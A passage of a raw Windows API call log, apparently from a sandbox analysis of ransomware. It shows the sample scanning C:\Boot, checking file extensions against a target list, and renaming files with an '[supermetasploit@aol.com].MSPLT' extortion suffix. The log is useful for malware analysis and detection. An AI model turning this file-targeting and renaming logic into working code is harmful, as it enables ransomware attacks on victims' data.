(lpString1=".rar", lpString2="\\BCD") returned -1 [0185.732] lstrlenW (lpString=".bz2") returned 4 [0185.732] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0185.732] lstrlenW (lpString=".7z") returned 3 [0185.732] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0185.732] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0185.732] lstrlenW (lpString=".dbf") returned 4 [0185.732] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0185.732] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0185.732] lstrlenW (lpString=".1cd") returned 4 [0185.732] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0185.732] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0185.732] lstrlenW (lpString=".jpg") returned 4 [0185.732] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0185.733] lstrcmpiW (lpString1=".LOG1", lpString2=".MSPLT") returned -1 [0185.733] lstrlenW (lpString="BCD.LOG1") returned 8 [0185.733] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0185.733] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=0) returned 1 [0185.733] CloseHandle (hObject=0x2f4) returned 1 [0185.734] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0185.734] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0185.734] lstrlenW (lpString=".doc") returned 4 [0185.734] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0185.734] lstrlenW (lpString=".docx") returned 5 [0185.734] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0185.734] lstrlenW (lpString=".pdf") returned 4 [0185.734] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0185.734] lstrlenW (lpString=".xls") returned 4 [0185.734] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0185.734] lstrlenW (lpString=".xlsx") returned 5 [0185.734] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0185.734] lstrlenW (lpString=".ppt") returned 4 [0185.734] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0185.734] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0185.734] lstrlenW (lpString=".zip") returned 4 [0185.734] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0185.734] lstrlenW (lpString=".rar") returned 4 [0185.734] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0185.734] lstrlenW (lpString=".bz2") returned 4 [0185.734] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0185.734] lstrlenW (lpString=".7z") returned 3 [0185.734] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0185.734] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0185.734] lstrlenW (lpString=".dbf") returned 4 [0185.734] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0185.735] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0185.735] lstrlenW (lpString=".1cd") returned 4 [0185.735] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0185.735] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0185.735] lstrlenW (lpString=".jpg") returned 4 [0185.735] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0185.735] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0185.735] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0185.735] lstrlenW (lpString=".doc") returned 4 [0185.735] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0185.735] lstrlenW (lpString=".docx") returned 5 [0185.735] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0185.735] lstrlenW (lpString=".pdf") returned 4 [0185.735] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0185.735] lstrlenW (lpString=".xls") returned 4 [0185.735] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0185.735] lstrlenW (lpString=".xlsx") returned 5 [0185.735] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0185.735] lstrlenW (lpString=".ppt") returned 4 [0185.735] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0185.735] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0185.735] lstrlenW (lpString=".zip") returned 4 [0185.735] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0185.735] lstrlenW (lpString=".rar") returned 4 [0185.735] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0185.736] lstrlenW (lpString=".bz2") returned 4 [0185.736] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0185.736] lstrlenW (lpString=".7z") returned 3 [0185.736] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0185.736] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0185.736] lstrlenW (lpString=".dbf") returned 4 [0185.736] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0185.736] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0185.736] lstrlenW (lpString=".1cd") returned 4 [0185.736] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0185.736] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0185.736] lstrlenW (lpString=".jpg") returned 4 [0185.736] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0185.736] lstrcmpiW (lpString1=".LOG2", lpString2=".MSPLT") returned -1 [0185.736] lstrlenW (lpString="BCD.LOG2") returned 8 [0185.736] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0185.737] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=0) returned 1 [0185.737] CloseHandle (hObject=0x2f4) returned 1 [0185.737] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0185.737] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0185.737] lstrlenW (lpString=".doc") returned 4 [0185.737] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0185.737] lstrlenW (lpString=".docx") returned 5 [0185.737] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0185.737] lstrlenW (lpString=".pdf") returned 4 [0185.737] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0185.737] lstrlenW (lpString=".xls") returned 4 [0185.737] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0185.737] lstrlenW (lpString=".xlsx") returned 5 [0185.737] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0185.737] lstrlenW (lpString=".ppt") returned 4 [0185.737] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0185.737] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0185.737] lstrlenW (lpString=".zip") returned 4 [0185.737] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0185.738] lstrlenW (lpString=".rar") returned 4 [0185.738] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0185.738] lstrlenW (lpString=".bz2") returned 4 [0185.738] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0185.738] lstrlenW (lpString=".7z") returned 3 [0185.738] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0185.738] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0185.738] lstrlenW (lpString=".dbf") returned 4 [0185.738] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0185.738] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0185.738] lstrlenW (lpString=".1cd") returned 4 [0185.738] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0185.738] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0185.738] lstrlenW (lpString=".jpg") returned 4 [0185.738] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0185.738] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0185.738] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0185.738] lstrlenW (lpString=".doc") returned 4 [0185.738] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0185.738] lstrlenW (lpString=".docx") returned 5 [0185.738] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0185.738] lstrlenW (lpString=".pdf") returned 4 [0185.738] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0185.738] lstrlenW (lpString=".xls") returned 4 [0185.739] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0185.739] lstrlenW (lpString=".xlsx") returned 5 [0185.739] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0185.739] lstrlenW (lpString=".ppt") returned 4 [0185.739] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0185.739] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0185.739] lstrlenW (lpString=".zip") returned 4 [0185.739] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0185.739] lstrlenW (lpString=".rar") returned 4 [0185.739] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0185.739] lstrlenW (lpString=".bz2") returned 4 [0185.739] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0185.739] lstrlenW (lpString=".7z") returned 3 [0185.739] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0185.739] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0185.739] lstrlenW (lpString=".dbf") returned 4 [0185.739] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0185.739] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0185.739] lstrlenW (lpString=".1cd") returned 4 [0185.739] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0185.739] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0185.739] lstrlenW (lpString=".jpg") returned 4 [0185.739] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0185.740] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0185.740] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0185.740] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0185.740] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=77664) returned 1 [0185.740] CloseHandle (hObject=0x2f4) returned 1 [0185.740] GetFileAttributesW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui")) returned 0x20 [0185.740] GetFileAttributesW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0185.740] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.741] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0185.741] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0185.741] lstrlenW (lpString=".doc") returned 4 [0185.741] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0185.741] lstrlenW (lpString=".docx") returned 5 [0185.741] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0185.741] lstrlenW (lpString=".pdf") returned 4 [0185.741] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0185.741] lstrlenW (lpString=".xls") returned 4 [0185.741] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0185.741] lstrlenW (lpString=".xlsx") returned 5 [0185.741] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0185.741] lstrlenW (lpString=".ppt") returned 4 [0185.741] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0185.741] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0185.741] lstrlenW (lpString=".zip") returned 4 [0185.741] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0185.741] lstrlenW (lpString=".rar") returned 4 [0185.742] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0185.742] lstrlenW (lpString=".bz2") returned 4 [0185.742] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0185.742] lstrlenW (lpString=".7z") returned 3 [0185.742] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0185.743] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0185.743] lstrlenW (lpString=".dbf") returned 4 [0185.743] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0185.743] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0185.743] lstrlenW (lpString=".1cd") returned 4 [0185.743] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0185.743] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0185.743] lstrlenW (lpString=".jpg") returned 4 [0185.743] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0185.743] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0185.743] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0185.743] lstrlenW (lpString=".doc") returned 4 [0185.743] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0185.743] lstrlenW (lpString=".docx") returned 5 [0185.743] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0185.743] lstrlenW (lpString=".pdf") returned 4 [0185.743] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0185.743] lstrlenW (lpString=".xls") returned 4 [0185.743] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0185.743] lstrlenW (lpString=".xlsx") returned 5 [0185.743] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0185.743] lstrlenW (lpString=".ppt") returned 4 [0185.743] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0185.743] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0185.744] lstrlenW (lpString=".zip") returned 4 [0185.744] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0185.744] lstrlenW (lpString=".rar") returned 4 [0185.744] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0185.744] lstrlenW (lpString=".bz2") returned 4 [0185.744] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0185.744] lstrlenW (lpString=".7z") returned 3 [0185.744] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0185.744] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0185.744] lstrlenW (lpString=".dbf") returned 4 [0185.744] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0185.744] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0185.744] lstrlenW (lpString=".1cd") returned 4 [0185.744] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0185.744] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0185.744] lstrlenW (lpString=".jpg") returned 4 [0185.744] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0185.744] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0185.744] lstrlenW (lpString="bootspaces.dll") returned 14 [0185.744] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0185.748] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=95648) returned 1 [0185.748] CloseHandle (hObject=0x350) returned 1 [0185.748] GetFileAttributesW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll")) returned 0x20 [0185.748] GetFileAttributesW (lpFileName="C:\\Boot\\bootspaces.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\bootspaces.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0185.749] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.749] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0185.749] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0185.749] lstrlenW (lpString=".doc") returned 4 [0185.749] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0185.749] lstrlenW (lpString=".docx") returned 5 [0185.749] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0185.749] lstrlenW (lpString=".pdf") returned 4 [0185.749] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0185.749] lstrlenW (lpString=".xls") returned 4 [0185.749] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0185.749] lstrlenW (lpString=".xlsx") returned 5 [0185.749] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0185.749] lstrlenW (lpString=".ppt") returned 4 [0185.749] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0185.749] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0185.749] lstrlenW (lpString=".zip") returned 4 [0185.749] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0185.749] lstrlenW (lpString=".rar") returned 4 [0185.749] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0185.749] lstrlenW (lpString=".bz2") returned 4 [0185.749] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0185.749] lstrlenW (lpString=".7z") returned 3 [0185.750] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0185.750] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0185.750] lstrlenW (lpString=".dbf") returned 4 [0185.750] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0185.750] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0185.750] lstrlenW (lpString=".1cd") returned 4 [0185.750] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0185.750] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0185.750] lstrlenW (lpString=".jpg") returned 4 [0185.750] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0185.750] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0185.750] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0185.750] lstrlenW (lpString=".doc") returned 4 [0185.750] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0185.750] lstrlenW (lpString=".docx") returned 5 [0185.750] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0185.750] lstrlenW (lpString=".pdf") returned 4 [0185.750] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0185.750] lstrlenW (lpString=".xls") returned 4 [0185.750] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0185.750] lstrlenW (lpString=".xlsx") returned 5 [0185.750] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0185.750] lstrlenW (lpString=".ppt") returned 4 [0185.750] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0185.750] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0185.751] lstrlenW (lpString=".zip") returned 4 [0185.751] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0185.751] lstrlenW (lpString=".rar") returned 4 [0185.751] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0185.751] lstrlenW (lpString=".bz2") returned 4 [0185.751] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0185.751] lstrlenW (lpString=".7z") returned 3 [0185.751] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0185.751] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0185.751] lstrlenW (lpString=".dbf") returned 4 [0185.751] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0185.751] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0185.751] lstrlenW (lpString=".1cd") returned 4 [0185.751] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0185.751] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0185.751] lstrlenW (lpString=".jpg") returned 4 [0185.751] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0185.751] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0185.751] lstrlenW (lpString="bootvhd.dll") returned 11 [0185.751] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0185.752] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=99744) returned 1 [0185.752] CloseHandle (hObject=0x350) returned 1 [0185.752] GetFileAttributesW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll")) returned 0x20 [0185.752] GetFileAttributesW (lpFileName="C:\\Boot\\bootvhd.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\bootvhd.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0185.752] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.752] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0185.752] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0185.752] lstrlenW (lpString=".doc") returned 4 [0185.752] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0185.753] lstrlenW (lpString=".docx") returned 5 [0185.753] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1 [0185.753] lstrlenW (lpString=".pdf") returned 4 [0185.753] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0185.753] lstrlenW (lpString=".xls") returned 4 [0185.753] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0185.753] lstrlenW (lpString=".xlsx") returned 5 [0185.753] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1 [0185.753] lstrlenW (lpString=".ppt") returned 4 [0185.753] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0185.753] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0185.753] lstrlenW (lpString=".zip") returned 4 [0185.753] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0185.753] lstrlenW (lpString=".rar") returned 4 [0185.753] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0185.753] lstrlenW (lpString=".bz2") returned 4 [0185.753] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0185.753] lstrlenW (lpString=".7z") returned 3 [0185.753] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0185.753] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0185.753] lstrlenW (lpString=".dbf") returned 4 [0185.753] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0186.192] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0186.313] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0186.423] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0186.444] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 Thread: id = 21 os_tid = 0x11bc [0167.281] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3e70048 [0167.282] lstrlenW (lpString="C:") returned 2 [0167.282] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x391fcf8 | out: lpFindFileData=0x391fcf8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77970000, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x8020d8 [0167.282] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0167.282] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent") returned 1 [0167.282] lstrlenW (lpString="$GetCurrent") returned 11 [0167.283] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="$GetCurrent") returned 1 [0167.283] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3e80050 [0167.283] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0167.283] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x802118 [0167.283] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, 